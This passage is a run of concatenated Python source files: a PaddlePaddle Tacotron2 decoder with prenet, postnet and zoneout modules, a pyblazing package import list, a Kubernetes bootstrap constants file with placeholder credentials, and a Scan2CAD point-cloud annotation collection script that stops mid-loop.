    of the inputs before they are fed to the auto-regressive LSTM,
    which helps to learn diagonal attentions.
Notes
----------
    This module always applies dropout, even in evaluation.
See the detail in `Natural TTS Synthesis by
Conditioning WaveNet on Mel Spectrogram Predictions`_.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
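    Examples
    ----------
    An illustrative call (the 80-dim input is only an assumption for demonstration):
    >>> prenet = Prenet(idim=80, n_layers=2, n_units=256)
    >>> ys = prenet(paddle.randn([4, 80]))  # output shape: (4, 256)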
"""
def __init__(self, idim, n_layers=2, n_units=256, dropout_rate=0.5):
"""Initialize prenet module.
Parameters
----------
idim : int
Dimension of the inputs.
        n_layers : int, optional
            The number of prenet layers.
        n_units : int, optional
            The number of prenet units.
        dropout_rate : float, optional
            Dropout rate applied after each prenet layer.
"""
super().__init__()
self.dropout_rate = dropout_rate
self.prenet = nn.LayerList()
for layer in six.moves.range(n_layers):
n_inputs = idim if layer == 0 else n_units
self.prenet.append(
nn.Sequential(nn.Linear(n_inputs, n_units), nn.ReLU()))
def forward(self, x):
"""Calculate forward propagation.
Parameters
----------
x : Tensor
Batch of input tensors (B, ..., idim).
Returns
----------
Tensor
Batch of output tensors (B, ..., odim).
"""
for i in six.moves.range(len(self.prenet)):
            # F.dropout introduces randomness; the dropout in Tacotron2 must not be removed
x = F.dropout(self.prenet[i](x))
return x
class Postnet(nn.Layer):
"""Postnet module for Spectrogram prediction network.
This is a module of Postnet in Spectrogram prediction network,
    which is described in `Natural TTS Synthesis by
    Conditioning WaveNet on Mel Spectrogram Predictions`_.
    The Postnet refines the predicted
    Mel-filterbank of the decoder,
    which helps to compensate for the fine structure of the spectrogram.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
"""
def __init__(
self,
idim,
odim,
n_layers=5,
n_chans=512,
n_filts=5,
dropout_rate=0.5,
use_batch_norm=True, ):
"""Initialize postnet module.
Parameters
----------
idim : int
Dimension of the inputs.
odim : int
Dimension of the outputs.
n_layers : int, optional
The number of layers.
        n_filts : int, optional
            The filter size of each convolution.
        n_chans : int, optional
            The number of filter channels.
use_batch_norm : bool, optional
Whether to use batch normalization..
dropout_rate : float, optional
Dropout rate..
"""
super().__init__()
self.postnet = nn.LayerList()
for layer in six.moves.range(n_layers - 1):
ichans = odim if layer == 0 else n_chans
ochans = odim if layer == n_layers - 1 else n_chans
if use_batch_norm:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
ochans,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.BatchNorm1D(ochans),
nn.Tanh(),
nn.Dropout(dropout_rate), ))
else:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
ochans,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.Tanh(),
nn.Dropout(dropout_rate), ))
ichans = n_chans if n_layers != 1 else odim
if use_batch_norm:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
odim,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.BatchNorm1D(odim),
nn.Dropout(dropout_rate), ))
else:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
odim,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.Dropout(dropout_rate), ))
def forward(self, xs):
"""Calculate forward propagation.
Parameters
----------
xs : Tensor
Batch of the sequences of padded input tensors (B, idim, Tmax).
Returns
----------
Tensor
Batch of padded output tensor. (B, odim, Tmax).
"""
for i in six.moves.range(len(self.postnet)):
xs = self.postnet[i](xs)
return xs
class ZoneOutCell(nn.Layer):
"""ZoneOut Cell module.
This is a module of zoneout described in
`Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`_.
This code is modified from `eladhoffer/seq2seq.pytorch`_.
Examples
----------
>>> lstm = paddle.nn.LSTMCell(16, 32)
>>> lstm = ZoneOutCell(lstm, 0.5)
.. _`Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`:
https://arxiv.org/abs/1606.01305
.. _`eladhoffer/seq2seq.pytorch`:
https://github.com/eladhoffer/seq2seq.pytorch
"""
def __init__(self, cell, zoneout_rate=0.1):
"""Initialize zone out cell module.
Parameters
----------
        cell : nn.Layer
Paddle recurrent cell module
e.g. `paddle.nn.LSTMCell`.
zoneout_rate : float, optional
Probability of zoneout from 0.0 to 1.0.
"""
super().__init__()
self.cell = cell
self.hidden_size = cell.hidden_size
self.zoneout_rate = zoneout_rate
if zoneout_rate > 1.0 or zoneout_rate < 0.0:
raise ValueError(
"zoneout probability must be in the range from 0.0 to 1.0.")
def forward(self, inputs, hidden):
"""Calculate forward propagation.
Parameters
----------
inputs : Tensor
Batch of input tensor (B, input_size).
hidden : tuple
- Tensor: Batch of initial hidden states (B, hidden_size).
- Tensor: Batch of initial cell states (B, hidden_size).
Returns
----------
Tensor
Batch of next hidden states (B, hidden_size).
tuple:
- Tensor: Batch of next hidden states (B, hidden_size).
- Tensor: Batch of next cell states (B, hidden_size).
"""
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.cell(inputs, hidden)
next_hidden = self._zoneout(hidden, next_hidden, self.zoneout_rate)
# to have the same output format with LSTMCell in paddle
return next_hidden[0], next_hidden
def _zoneout(self, h, next_h, prob):
# apply recursively
if isinstance(h, tuple):
num_h = len(h)
if not isinstance(prob, tuple):
prob = tuple([prob] * num_h)
return tuple(
[self._zoneout(h[i], next_h[i], prob[i]) for i in range(num_h)])
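        # During training each hidden unit keeps its previous value with
        # probability `prob` (per-unit Bernoulli mask); at inference time the
        # expectation of that mixture is used instead.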
if self.training:
mask = paddle.bernoulli(paddle.ones([*paddle.shape(h)]) * prob)
return mask * h + (1 - mask) * next_h
else:
return prob * h + (1 - prob) * next_h
class Decoder(nn.Layer):
"""Decoder module of Spectrogram prediction network.
This is a module of decoder of Spectrogram prediction network in Tacotron2,
    which is described in `Natural TTS
Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_.
The decoder generates the sequence of
features from the sequence of the hidden states.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
"""
def __init__(
self,
idim,
odim,
att,
dlayers=2,
dunits=1024,
prenet_layers=2,
prenet_units=256,
postnet_layers=5,
postnet_chans=512,
postnet_filts=5,
output_activation_fn=None,
cumulate_att_w=True,
use_batch_norm=True,
use_concate=True,
dropout_rate=0.5,
zoneout_rate=0.1,
reduction_factor=1, ):
"""Initialize Tacotron2 decoder module.
Parameters
----------
idim : int
Dimension of the inputs.
odim : int
Dimension of the outputs.
        att : nn.Layer
            Instance of attention class.
        dlayers : int, optional
The number of decoder lstm layers.
dunits : int, optional
The number of decoder lstm units.
prenet_layers : int, optional
The number of prenet layers.
prenet_units : int, optional
The number of prenet units.
postnet_layers : int, optional
The number of postnet layers.
postnet_filts : int, optional
The number of postnet filter size.
postnet_chans : int, optional
The number of postnet filter channels.
output_activation_fn : nn.Layer, optional
Activation function for outputs.
cumulate_att_w : bool, optional
Whether to cumulate previous attention weight.
use_batch_norm : bool, optional
Whether to use batch normalization.
use_concate : bool, optional
Whether to concatenate encoder embedding with decoder lstm outputs.
dropout_rate : float, optional
Dropout rate.
zoneout_rate : float, optional
Zoneout rate.
reduction_factor : int, optional
Reduction factor.
"""
super().__init__()
# store the hyperparameters
self.idim = idim
self.odim = odim
self.att = att
self.output_activation_fn = output_activation_fn
self.cumulate_att_w = cumulate_att_w
self.use_concate = use_concate
self.reduction_factor = reduction_factor
# check attention type
if isinstance(self.att, AttForwardTA):
self.use_att_extra_inputs = True
else:
self.use_att_extra_inputs = False
# define lstm network
prenet_units = prenet_units if prenet_layers != 0 else odim
self.lstm = nn.LayerList()
for layer in six.moves.range(dlayers):
iunits = idim + prenet_units if layer == 0 else dunits
lstm = nn.LSTMCell(iunits, dunits)
if zoneout_rate > 0.0:
lstm = ZoneOutCell(lstm, zoneout_rate)
self.lstm.append(lstm)
# define prenet
if prenet_layers > 0:
self.prenet = Prenet(
idim=odim,
n_layers=prenet_layers,
n_units=prenet_units,
dropout_rate=dropout_rate, )
else:
self.prenet = None
# define postnet
if postnet_layers > 0:
self.postnet = Postnet(
idim=idim,
odim=odim,
n_layers=postnet_layers,
n_chans=postnet_chans,
n_filts=postnet_filts,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate, )
else:
self.postnet = None
# define projection layers
iunits = idim + dunits if use_concate else dunits
self.feat_out = nn.Linear(
iunits, odim * reduction_factor, bias_attr=False)
self.prob_out = nn.Linear(iunits, reduction_factor)
# initialize
# self.apply(decoder_init)
def _zero_state(self, hs):
init_hs = paddle.zeros([paddle.shape(hs)[0], self.lstm[0].hidden_size])
return init_hs
def forward(self, hs, hlens, ys):
"""Calculate forward propagation.
Parameters
----------
hs : Tensor
Batch of the sequences of padded hidden states (B, Tmax, idim).
hlens : Tensor(int64) padded
Batch of lengths of each input batch (B,).
ys : Tensor
Batch of the sequences of padded target features (B, Lmax, odim).
Returns
----------
Tensor
Batch of output tensors after postnet (B, Lmax, odim).
Tensor
Batch of output tensors before postnet (B, Lmax, odim).
Tensor
Batch of logits of stop prediction (B, Lmax).
Tensor
Batch of attention weights (B, Lmax, Tmax).
Note
----------
This computation is performed in teacher-forcing manner.
"""
# thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim)
if self.reduction_factor > 1:
ys = ys[:, self.reduction_factor - 1::self.reduction_factor]
# length list should be list of int
# hlens = list(map(int, hlens))
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# loop for an output sequence
outs, logits, att_ws = [], [], []
for y in ys.transpose([1, 0, 2]):
if self.use_att_extra_inputs:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w,
prev_out)
else:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w)
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
for i in six.moves.range(1, len(self.lstm)):
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[i](z_list[i - 1],
(z_list[i], c_list[i]))
z_list[i], c_list[i] = next_hidden
zcs = (paddle.concat([z_list[-1], att_c], axis=1)
if self.use_concate else z_list[-1])
outs += [
self.feat_out(zcs).reshape([paddle.shape(hs)[0], self.odim, -1])
]
logits += [self.prob_out(zcs)]
att_ws += [att_w]
# teacher forcing
prev_out = y
if self.cumulate_att_w and prev_att_w is not None:
prev_att_w = prev_att_w + att_w # Note: error when use +=
else:
prev_att_w = att_w
# (B, Lmax)
logits = paddle.concat(logits, axis=1)
# (B, odim, Lmax)
before_outs = paddle.concat(outs, axis=2)
# (B, Lmax, Tmax)
att_ws = paddle.stack(att_ws, axis=1)
if self.reduction_factor > 1:
# (B, odim, Lmax)
before_outs = before_outs.reshape(
[paddle.shape(before_outs)[0], self.odim, -1])
if self.postnet is not None:
# (B, odim, Lmax)
after_outs = before_outs + self.postnet(before_outs)
else:
after_outs = before_outs
# (B, Lmax, odim)
before_outs = before_outs.transpose([0, 2, 1])
# (B, Lmax, odim)
after_outs = after_outs.transpose([0, 2, 1])
logits = logits
# apply activation function for scaling
if self.output_activation_fn is not None:
before_outs = self.output_activation_fn(before_outs)
after_outs = self.output_activation_fn(after_outs)
return after_outs, before_outs, logits, att_ws
def inference(
self,
h,
threshold=0.5,
minlenratio=0.0,
maxlenratio=10.0,
use_att_constraint=False,
backward_window=None,
forward_window=None, ):
"""Generate the sequence of features given the sequences of characters.
Parameters
----------
h : Tensor
Input sequence of encoder hidden states (T, C).
threshold : float, optional
Threshold to stop generation.
minlenratio : float, optional
Minimum length ratio.
If set to 1.0 and the length of input is 10,
the minimum length of outputs will be 10 * 1 = 10.
        maxlenratio : float, optional
            Maximum length ratio.
If set to 10 and the length of input is 10,
the maximum length of outputs will be 10 * 10 = 100.
use_att_constraint : bool
Whether to apply attention constraint introduced in `Deep Voice 3`_.
backward_window : int
Backward window size in attention constraint.
forward_window : int
Forward window size in attention constraint.
Returns
----------
Tensor
Output sequence of features (L, odim).
Tensor
Output sequence of stop probabilities (L,).
Tensor
Attention weights (L, T).
Note
----------
This computation is performed in auto-regressive manner.
.. _`Deep Voice 3`: https://arxiv.org/abs/1710.07654
"""
# setup
assert len(paddle.shape(h)) == 2
hs = h.unsqueeze(0)
ilens = paddle.shape(h)[0]
maxlen = int(paddle.shape(h)[0] * maxlenratio)
minlen = int(paddle.shape(h)[0] * minlenratio)
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([1, self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# setup for attention constraint
if use_att_constraint:
last_attended_idx = 0
else:
last_attended_idx = None
# loop for an output sequence
idx = 0
outs, att_ws, probs = [], [], []
while True:
            # update the index
idx += self.reduction_factor
# decoder calculation
if self.use_att_extra_inputs:
att_c, att_w = self.att(
hs,
ilens,
z_list[0],
prev_att_w,
prev_out,
last_attended_idx=last_attended_idx,
backward_window=backward_window,
forward_window=forward_window, )
else:
att_c, att_w = self.att(
hs,
ilens,
z_list[0],
prev_att_w,
last_attended_idx=last_attended_idx,
backward_window=backward_window,
forward_window=forward_window, )
att_ws += [att_w]
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
for i in six.moves.range(1, len(self.lstm)):
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[i](z_list[i - 1],
(z_list[i], c_list[i]))
z_list[i], c_list[i] = next_hidden
zcs = (paddle.concat([z_list[-1], att_c], axis=1)
if self.use_concate else z_list[-1])
# [(1, odim, r), ...]
outs += [self.feat_out(zcs).reshape([1, self.odim, -1])]
# [(r), ...]
probs += [F.sigmoid(self.prob_out(zcs))[0]]
if self.output_activation_fn is not None:
prev_out = self.output_activation_fn(
outs[-1][:, :, -1]) # (1, odim)
else:
prev_out = outs[-1][:, :, -1] # (1, odim)
if self.cumulate_att_w and prev_att_w is not None:
prev_att_w = prev_att_w + att_w # Note: error when use +=
else:
prev_att_w = att_w
if use_att_constraint:
last_attended_idx = int(att_w.argmax())
# check whether to finish generation
if sum(paddle.cast(probs[-1] >= threshold,
'int64')) > 0 or idx >= maxlen:
                # check minimum length
if idx < minlen:
continue
# (1, odim, L)
outs = paddle.concat(outs, axis=2)
if self.postnet is not None:
# (1, odim, L)
outs = outs + self.postnet(outs)
# (L, odim)
outs = outs.transpose([0, 2, 1]).squeeze(0)
probs = paddle.concat(probs, axis=0)
att_ws = paddle.concat(att_ws, axis=0)
break
if self.output_activation_fn is not None:
outs = self.output_activation_fn(outs)
return outs, probs, att_ws
def calculate_all_attentions(self, hs, hlens, ys):
"""Calculate all of the attention weights.
Parameters
----------
hs : Tensor
Batch of the sequences of padded hidden states (B, Tmax, idim).
hlens : Tensor(int64)
Batch of lengths of each input batch (B,).
ys : Tensor
Batch of the sequences of padded target features (B, Lmax, odim).
Returns
----------
numpy.ndarray
Batch of attention weights (B, Lmax, Tmax).
Note
----------
This computation is performed in teacher-forcing manner.
"""
# thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim)
if self.reduction_factor > 1:
ys = ys[:, self.reduction_factor - 1::self.reduction_factor]
# length list should be list of int
hlens = list(map(int, hlens))
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# loop for an output sequence
att_ws = []
for y in ys.transpose([1, 0, 2]):
if self.use_att_extra_inputs:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w,
prev_out)
else:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w)
att_ws += [att_w]
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
            for i in six.moves.range(1, len(self.lstm)):
                # we only use the second output of LSTMCell in paddle
                _, next_hidden = self.lstm[i](z_list[i - 1],
                                              (z_list[i], c_list[i]))
                z_list[i], c_list[i] = next_hidden
# teacher forcing
prev_out = y
if self.cumulate_att_w and prev_att_w is not None:
# Note: error when use +=
prev_att_w = prev_att_w + att_w
else:
prev_att_w = att_w
# (B, Lmax, Tmax)
att_ws = paddle.stack(att_ws, axis=1)
return att_ws
| 2.21875 | 2 |
pyblazing/__init__.py | Mattlk13/pyBlazing | 0 | 5525 | from .api import run_query_get_token
from .api import convert_to_dask
from .api import run_query_get_results
from .api import run_query_get_concat_results
from .api import register_file_system
from .api import deregister_file_system
from .api import FileSystemType, DriverType, EncryptionType
from .api import SchemaFrom
from .api import create_table
from .api import ResultSetHandle
from .api import _get_client
from .api import gdf_dtype
from .api import get_dtype_values
from .api import get_np_dtype_to_gdf_dtype
from .api import SetupOrchestratorConnection
from .apiv2.context import make_default_orc_arg
from .apiv2.context import make_default_csv_arg
| 1.296875 | 1 |
bootstrap/p1.5.0/src/common/const.py | apurwaj2/df-on-k8s | 0 | 5526 |
class Constants(object):
LOGGER_CONF = "common/mapr_conf/logger.yml"
USERNAME = "mapr"
GROUPNAME = "mapr"
USERID = 5000
GROUPID = 5000
ADMIN_USERNAME = "custadmin"
ADMIN_GROUPNAME = "custadmin"
ADMIN_USERID = 7000
ADMIN_GROUPID = 7000
ADMIN_PASS = "<PASSWORD>"
MYSQL_USER = "admin"
MYSQL_PASS = "<PASSWORD>"
LDAPADMIN_USER = "admin"
LDAPADMIN_PASS = "<PASSWORD>"
LDAPBIND_USER = "readonly"
LDAPBIND_PASS = "<PASSWORD>"
EXAMPLE_LDAP_NAMESPACE = "hpe-ldap"
CSI_REPO = "quay.io/k8scsi"
KDF_REPO = "docker.io/maprtech" #registry.hub.docker.com/maprtech
KUBEFLOW_REPO = "gcr.io/mapr-252711/kf-ecp-5.3.0"
OPERATOR_REPO = "gcr.io/mapr-252711"
KUBELET_DIR = "/var/lib/kubelet"
ECP_KUBELET_DIR = "/var/lib/docker/kubelet"
LOCAL_PATH_PROVISIONER_REPO= ""
KFCTL_HSP_ISTIO_REPO = ""
BUSYBOX_REPO = ""
def enum(**named_values):
return type('Enum', (), named_values)
AUTH_TYPES = enum(CUSTOM_LDAP='customLDAP', RAW_LINUX_USERS='rawLinuxUsers', EXAMPLE_LDAP='exampleLDAP')
# OPEN SSL
OPENSSL = '/usr/bin/openssl'
KEY_SIZE = 1024
DAYS = 3650
CA_CERT = 'ca.cert'
CA_KEY = 'ca.key'
# http://www.openssl.org/docs/apps/openssl.html#PASS_PHRASE_ARGUMENTS
X509_EXTRA_ARGS = ()
OPENSSL_CONFIG_TEMPLATE = """
prompt = no
distinguished_name = req_distinguished_name
req_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = CO
L = Fort Collins
O = HPE
OU = HCP
CN = %(service)s
emailAddress = <EMAIL>
[ v3_req ]
# Extensions to add to a certificate request
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[ alt_names ]
DNS.1 = %(service)s
DNS.2 = %(service)s.%(namespace)s
DNS.3 = %(service)s.%(namespace)s.svc
"""
| 1.929688 | 2 |
dataset/scan2cad/s2c_collect_pgroup.py | jeonghyunkeem/PointGroup | 0 | 5527 | <gh_stars>0
# <NAME>, UVR KAIST @<EMAIL>
import os, sys
import json
import h5py
import numpy as np
import quaternion
import torch
from torch.utils.data import Dataset
BASE_DIR_1 = os.path.dirname(os.path.abspath(__file__)) # scan2cad
BASE_DIR = os.path.dirname(BASE_DIR_1) # dataset
ROOT_DIR = os.path.dirname(BASE_DIR) # PointGroup
DATA_DIR = os.path.dirname(ROOT_DIR) # /root/
DATA_DIR = os.path.join(DATA_DIR, 'Dataset') # /root/Dataset
DUMP_DIR = os.path.join(ROOT_DIR, 'data')
sys.path.append(BASE_DIR)
sys.path.append(ROOT_DIR)
from s2c_map import CLASS_MAPPING, ID2NAME, CARED_CLASS_MASK
from s2c_config import Scan2CADDatasetConfig
import s2c_utils
sys.path.append(os.path.join(ROOT_DIR, 'models/retrieval/'))
DC = Scan2CADDatasetConfig()
MAX_NUM_POINT = 50000
MAX_NUM_OBJ = 64
INS_NUM_POINT = 2048
FEATURE_DIMENSION = 512
MAX_DATA_SIZE = 15000
CHUNK_SIZE = 1000
INF = 9999
NOT_CARED_ID = np.array([INF]) # wall, floor
# Thresholds
PADDING = 0.05
SCALE_THRASHOLD = 0.05
SEG_THRESHOLD = 1
REMAPPER = np.ones(35, dtype=np.int64) * (-1)
for i, x in enumerate(CARED_CLASS_MASK):
REMAPPER[x] = i
print(f'REMAPPER[{x:2d}] => {i:2d}')
SYM2CLASS = {"__SYM_NONE": 0, "__SYM_ROTATE_UP_2": 1, "__SYM_ROTATE_UP_4": 2, "__SYM_ROTATE_UP_INF": 3}
# functions ==============================================================================================
def from_q_to_6d(q):
q = np.quaternion(q[0], q[1], q[2], q[3])
mat = quaternion.as_rotation_matrix(q) # 3x3
rep6d = mat[:, 0:2].transpose().reshape(-1, 6) # 6
return rep6d
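# Hedged example (added for illustration, not from the original file): the identity quaternion
# (w, x, y, z) = (1, 0, 0, 0) gives the identity rotation matrix, so its 6D representation is
# just the first two matrix columns flattened:
#   from_q_to_6d([1, 0, 0, 0])  ->  array([[1., 0., 0., 0., 1., 0.]])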
def nn_search(p, ps):
target = torch.from_numpy(ps.copy())
p = torch.from_numpy(p.copy())
p_diff = target - p
p_dist = torch.sum(p_diff**2, dim=-1)
dist, idx = torch.min(p_dist, dim=-1)
return dist.item(), idx.item()
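# Minimal sketch of what nn_search returns (values made up for illustration): the squared
# distance to, and index of, the row of `ps` closest to the query point `p`, e.g.
#   nn_search(np.array([0., 0., 0.]), np.array([[1., 0., 0.], [0.5, 0., 0.]]))  ->  (0.25, 1)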
def make_M_from_tqs(t, q, s):
q = np.quaternion(q[0], q[1], q[2], q[3])
T = np.eye(4)
T[0:3, 3] = t
R = np.eye(4)
R[0:3, 0:3] = quaternion.as_rotation_matrix(q)
S = np.eye(4)
S[0:3, 0:3] = np.diag(s)
M = T.dot(R).dot(S)
return M
def compose_mat4(t, q, s, center=None):
if not isinstance(q, np.quaternion):
q = np.quaternion(q[0], q[1], q[2], q[3])
T = np.eye(4)
T[0:3, 3] = t
R = np.eye(4)
R[0:3, 0:3] = quaternion.as_rotation_matrix(q)
S = np.eye(4)
S[0:3, 0:3] = np.diag(s)
C = np.eye(4)
if center is not None:
C[0:3, 3] = center
M = T.dot(R).dot(S).dot(C)
return M
def decompose_mat4(M):
R = M[0:3, 0:3].copy()
sx = np.linalg.norm(R[0:3, 0])
sy = np.linalg.norm(R[0:3, 1])
sz = np.linalg.norm(R[0:3, 2])
s = np.array([sx, sy, sz])
R[:,0] /= sx
R[:,1] /= sy
R[:,2] /= sz
q = quaternion.from_rotation_matrix(R[0:3, 0:3])
t = M[0:3, 3]
return t, q, s
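# Rough round-trip sketch (added as an illustration; the numbers are made up): composing a
# transform from translation, rotation and scale and then decomposing it should recover the
# same components up to floating-point error. The helper below is never called by the script.
def _demo_compose_decompose():
    t = np.array([1.0, 2.0, 3.0])
    q = np.quaternion(1.0, 0.0, 0.0, 0.0)  # identity rotation
    s = np.array([2.0, 2.0, 2.0])
    M = compose_mat4(t, q, s)
    t2, q2, s2 = decompose_mat4(M)
    assert np.allclose(t, t2) and np.allclose(s, s2)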
# ========================================================================================================
LOG_N = 100
def print_log(log):
print('-'*LOG_N+'\n'+log+' \n'+'-'*LOG_N)
class Scan2CADCollect(Dataset):
def __init__(self, split_set='train', distr_check=False):
self.data_path = os.path.join(DATA_DIR, 'Scan2CAD/export')
self.out_path = os.path.join(BASE_DIR_1, 'data4')
if not os.path.exists(self.out_path):
os.mkdir(self.out_path)
print("Create export directory: {}".format(self.out_path))
all_scan_names = list(set([os.path.basename(x)[0:12] \
for x in os.listdir(self.data_path) if x.startswith('scene')]))
self.scan_names = []
if split_set in ['all', 'train', 'val', 'test']:
split_filenames = os.path.join(BASE_DIR_1, 'meta_data',
'scan2cad_{}.txt'.format(split_set))
with open(split_filenames, 'r') as f:
self.scan_list = f.read().splitlines()
# remove unavailiable scans
num_scans = len(self.scan_list)
self.scan_list = [sname for sname in self.scan_list \
if sname in all_scan_names]
print_log('Dataset for {}: kept {} scans out of {}'.format(split_set, len(self.scan_list), num_scans))
num_scans = len(self.scan_list)
else:
print('illegal split name')
return
filename_json = BASE_DIR_1 + "/full_annotations.json"
assert filename_json
self.dataset = {}
cat_summary = dict.fromkeys(DC.ClassToName, 0)
cat_ids = []
with open(filename_json, 'r') as f:
data = json.load(f)
d = {}
i = -1
for idx, r in enumerate(data):
i_scan = r["id_scan"]
if i_scan not in self.scan_list:
continue
self.scan_names.append(i_scan)
i += 1
d[i] = {}
d[i]['id_scan'] = i_scan
d[i]['trs'] = r["trs"]
n_model = r["n_aligned_models"]
d[i]['n_total'] = n_model
d[i]['models'] = {}
for j in range(n_model):
d[i]['models'][j] = {}
d[i]['models'][j]['trs'] = r["aligned_models"][j]['trs']
d[i]['models'][j]['center'] = r["aligned_models"][j]['center']
d[i]['models'][j]['bbox'] = r["aligned_models"][j]['bbox']
d[i]['models'][j]['sym'] = SYM2CLASS[r["aligned_models"][j]['sym']]
d[i]['models'][j]['fname'] = r["aligned_models"][j]['id_cad']
cat_id = r["aligned_models"][j]['catid_cad']
cat_ids.append(cat_id)
d[i]['models'][j]['cat_id'] = cat_id
cat_class = DC.ShapenetIDtoClass(cat_id)
d[i]['models'][j]['sem_cls'] = cat_class
# category summary
cat_summary[cat_class]+=1
self.dataset = d
self.cat_ids = np.unique(cat_ids)
if distr_check:
for k, v in sorted(cat_summary.items(), key=lambda item:item[1], reverse=True):
print(f'{k:2d}: {DC.ClassToName[k]:12s} => {v:4d}')
def __len__(self):
return len(self.dataset)
def size_check(self, scale, id_scan, sem_cls):
check = False
if scale[0] < SCALE_THRASHOLD:
scale[0] = SCALE_THRASHOLD
check = True
if scale[1] < SCALE_THRASHOLD:
scale[1] = SCALE_THRASHOLD
check = True
if scale[2] < SCALE_THRASHOLD:
scale[2] = SCALE_THRASHOLD
check = True
return scale
def collect(self, N, dump=False):
""" Return dictionary of {verts(x,y,z): cad filename}
Note:
NK = a total number of instances in dataset
V = a number of vertices
args:
N: int
a size of dataset
return:
dict: (NK, 1, V, 3)
a dictionary for verts-cad_file pairs
"""
# ======= GLOBAL LABEL VARIABLES =======
error_scan = {} # Text
# Anchor collection (for detection)
print_log(" LOADING SCENES")
collect_path = os.path.join(BASE_DIR, 'collect')
for index in range(N):
data = self.dataset[index]
id_scan = data['id_scan']
K = data['n_total']
assert(K <= MAX_NUM_OBJ)
# Point Cloud
mesh_vertices = np.load(os.path.join(self.data_path, id_scan) + '_vert.npy') # (N, 3)
semantic_labels = np.load(os.path.join(self.data_path, id_scan) + '_sem_label.npy') # (N, sem_cls(0, 1~35, 36~MAX, INF))
point_cloud = mesh_vertices[:,0:3]
colors = mesh_vertices[:,3:6] / 127.5 - 1
instance_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1)
semantic_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1)
# Sorting points cropping order to avoid overlapping
sort_by_scale = {}
for model in range(K):
obj_scale = np.array(data['models'][model]['trs']['scale'])
sort_by_scale[model] = np.sum(obj_scale)
model_scale_order = {model: scale for model, scale in sorted(sort_by_scale.items(), key=(lambda item:item[1]), reverse=True)}
K = len(model_scale_order.keys())
# Iterate on scale_order
checked = False
k = -1
for i, model in enumerate(model_scale_order.keys()):
k += 1
# semantics ()
sem_cls = data['models'][model]['sem_cls'] # (0~num_classes-1)
# Transform
obj_center = np.array(data['models'][model]['center'])
obj_translation = np.array(data['models'][model]['trs']['translation'])
obj_rotation = np.array(data['models'][model]['trs']['rotation'])
obj_scale = np.array(data['models'][model]['trs']['scale'])
obj_scale = self.size_check(obj_scale, id_scan, sem_cls)
Mobj = compose_mat4(obj_translation, obj_rotation, obj_scale, obj_center)
# Instance vertices
# - (1) Region Crop & Axis-aligned Bounding Box
vert_choices = np.array([])
ins_bbox = np.array(data['models'][model]['bbox'])
obj_corners = s2c_utils.get_3d_box_rotated(ins_bbox, Mobj, padding=PADDING)
ex_points, obj_vert_ind = s2c_utils.extract_pc_in_box3d(point_cloud, obj_corners)
nx = ex_points.shape[0]
# - (2) Instance Segments Crop
seg_points, vert_choices = \
s2c_utils.filter_dominant_cls(point_cloud, obj_vert_ind, semantic_labels, sem_cls+1, NOT_CARED_ID)
seg_nx = seg_points.shape[0]
# ======= Semantic/Instance vertices =======
if seg_nx < SEG_THRESHOLD:
k -= 1
checked = True
continue
sem_cls = REMAPPER[sem_cls]
